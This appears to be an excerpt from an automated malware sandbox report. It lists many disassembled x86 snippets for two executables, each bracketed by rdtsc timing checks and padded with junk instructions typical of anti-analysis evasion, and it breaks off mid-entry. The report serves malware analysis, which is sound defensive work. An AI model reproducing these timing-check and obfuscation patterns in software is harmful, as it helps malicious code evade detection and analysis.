Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210A80 second address: 5210AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F1D94C8C5BCh 0x00000010 pushad 0x00000011 mov di, ax 0x00000014 jmp 00007F1D94C8C5BCh 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007F1D94C8C5BBh 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F1D94C8C5C5h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210AE1 second address: 5210B07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F81631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1D94F8162Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B07 second address: 5210B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B23 second address: 5210B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B27 second address: 5210B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B2D second address: 5210B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1D94F81631h 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 5AF569 second address: 5AF56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 5AF56D second address: 5AF587 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1D94F81628h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d je 00007F1D94F81626h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72C219 second address: 72C227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1D94C8C5B6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72C227 second address: 72C234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F1D94F8162Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72C234 second address: 72C238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72C238 second address: 72C23D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72C23D second address: 72C25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F1D94C8C5EDh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1D94C8C5BEh 0x00000016 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72C25C second address: 72C26A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72C26A second address: 72C27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94C8C5BFh 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7188EA second address: 718906 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1D94F8162Ch 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F1D94F81626h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B18A second address: 72B199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007F1D94C8C5B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B199 second address: 72B1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1D94F8162Bh 0x00000011 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B1B0 second address: 72B1C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F1D94C8C5BAh 0x0000000c rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B356 second address: 72B377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1D94F81637h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B377 second address: 72B37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B37B second address: 72B396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F1D94F81626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B396 second address: 72B3A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1D94C8C5B6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B7A4 second address: 72B7BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F8162Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F1D94F81626h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72B7BE second address: 72B7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72D4B3 second address: 72D517 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1D94F8162Ch 0x00000008 jc 00007F1D94F81626h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F1D94F81628h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d push ecx 0x0000002e mov ch, 68h 0x00000030 pop edx 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 pushad 0x00000035 call 00007F1D94F81635h 0x0000003a pop edx 0x0000003b mov eax, ecx 0x0000003d popad 0x0000003e pop esi 0x0000003f and dh, 00000000h 0x00000042 push 3625D396h 0x00000047 push eax 0x00000048 push edx 0x00000049 ja 00007F1D94F81628h 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72D517 second address: 72D5BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 3625D316h 0x0000000f sub si, 5100h 0x00000014 add ecx, dword ptr [ebp+122D2E69h] 0x0000001a push 00000003h 0x0000001c mov si, 6E5Ah 0x00000020 mov ecx, dword ptr [ebp+122D2AABh] 0x00000026 push 00000000h 0x00000028 jno 00007F1D94C8C5BCh 0x0000002e mov dword ptr [ebp+122D26C6h], ecx 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F1D94C8C5B8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 jg 00007F1D94C8C5BCh 0x00000056 mov dword ptr [ebp+122D1FD0h], edx 0x0000005c push A2B08A00h 0x00000061 pushad 0x00000062 jnl 00007F1D94C8C5B8h 0x00000068 push edx 0x00000069 jnl 00007F1D94C8C5B6h 0x0000006f pop edx 0x00000070 popad 0x00000071 xor dword ptr [esp], 62B08A00h 0x00000078 mov dword ptr [ebp+122D2141h], ecx 0x0000007e lea ebx, dword ptr [ebp+124523C9h] 0x00000084 mov dword ptr [ebp+122D1DF5h], ebx 0x0000008a mov edi, dword ptr [ebp+122D2DF1h] 0x00000090 xchg eax, ebx 0x00000091 push ebx 0x00000092 push eax 0x00000093 push edx 0x00000094 jno 00007F1D94C8C5B6h 0x0000009a rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72D5BB second address: 72D5D7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007F1D94F8162Ch 0x00000013 jg 00007F1D94F81626h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72D6F9 second address: 72D740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jng 00007F1D94C8C5BAh 0x00000011 push eax 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b jmp 00007F1D94C8C5BBh 0x00000020 pop eax 0x00000021 jno 00007F1D94C8C5BCh 0x00000027 popad 0x00000028 mov eax, dword ptr [eax] 0x0000002a push eax 0x0000002b push edx 0x0000002c jbe 00007F1D94C8C5B8h 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72D740 second address: 72D76F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F1D94F81626h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007F1D94F81639h 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72D7FC second address: 72D833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1D94C8C5BCh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 or dword ptr [ebp+122D2713h], ebx 0x00000019 push 00000000h 0x0000001b mov di, E633h 0x0000001f push 445BA561h 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 72D833 second address: 72D837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 74C7DA second address: 74C7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 74C905 second address: 74C90B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 74D04A second address: 74D05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jg 00007F1D94C8C5D1h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 74D1E1 second address: 74D1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94F81634h 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 74D389 second address: 74D39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007F1D94C8C5B6h 0x00000012 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 74D5FB second address: 74D617 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1D94F81626h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 js 00007F1D94F81626h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 74D617 second address: 74D61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 74597D second address: 745982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 745982 second address: 745995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F1D94C8C5BAh 0x0000000e rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 745995 second address: 745999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 71F60F second address: 71F62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jp 00007F1D94C8C5B6h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F1D94C8C5BEh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 752ADD second address: 752AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1D94F81626h 0x0000000a rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 754661 second address: 75466B instructions: 0x00000000 rdtsc 0x00000002 js 00007F1D94C8C5BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7557BA second address: 7557C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7557C0 second address: 7557DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F1D94C8C5C6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7557DB second address: 7557F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1D94F81635h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75AF62 second address: 75AF68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75AF68 second address: 75AF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94F8162Ah 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 71BF82 second address: 71BF9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 71BF9D second address: 71BFA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75A467 second address: 75A47A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F1D94C8C5BCh 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75A47A second address: 75A480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75CD5D second address: 75CD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 add dword ptr [esp], 73D7010Dh 0x0000000d mov dword ptr [ebp+122D2AEAh], ebx 0x00000013 push D5F82901h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1D94C8C5C1h 0x0000001f rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75CF13 second address: 75CF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75CF17 second address: 75CF1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75CF1B second address: 75CF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75CF21 second address: 75CF26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75D0EE second address: 75D109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1D94F81636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75D109 second address: 75D121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jp 00007F1D94C8C5BCh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75D44D second address: 75D46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1D94F81633h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75D46D second address: 75D472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75D8EE second address: 75D906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1D94F81626h 0x00000009 jnl 00007F1D94F81626h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75D906 second address: 75D90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75DB4C second address: 75DB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75DB52 second address: 75DB56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75DD26 second address: 75DD2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75DD2A second address: 75DD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75DD30 second address: 75DD44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1D94F81630h 0x00000009 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 75DE78 second address: 75DE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 pushad 0x00000008 ja 00007F1D94C8C5B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7610BC second address: 7610C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7610C0 second address: 7610CD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1D94C8C5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 7610CD second address: 76115A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F1D94F81637h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F1D94F81628h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 add esi, 5697CF1Dh 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D211Bh], esi 0x00000037 mov edi, dword ptr [ebp+122D2DD1h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F1D94F81628h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D2583h] 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F1D94F81630h 0x00000067 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 716DD1 second address: 716DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 716DD7 second address: 716DDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 716DDD second address: 716DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F1D94C8C5B6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 762F79 second address: 762F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 762F7D second address: 762F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\AAAAECGHCB.exe	RDTSC instruction interceptor: First address: 762F83 second address: 762FE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F1D94F8162Eh 0x0000000f nop 0x00000010 xor esi, dword ptr [ebp+122D1DF9h] 0x00000016 xor edi, 6203AAD3h 0x0000001c push 00000000h 0x0000001e sbb si, 3FC1h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F1D94F81628h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D3131h], ebx 0x00000045 xchg eax, ebx 0x00000046 jo 00007F1D94F81634h 0x0000004c push eax 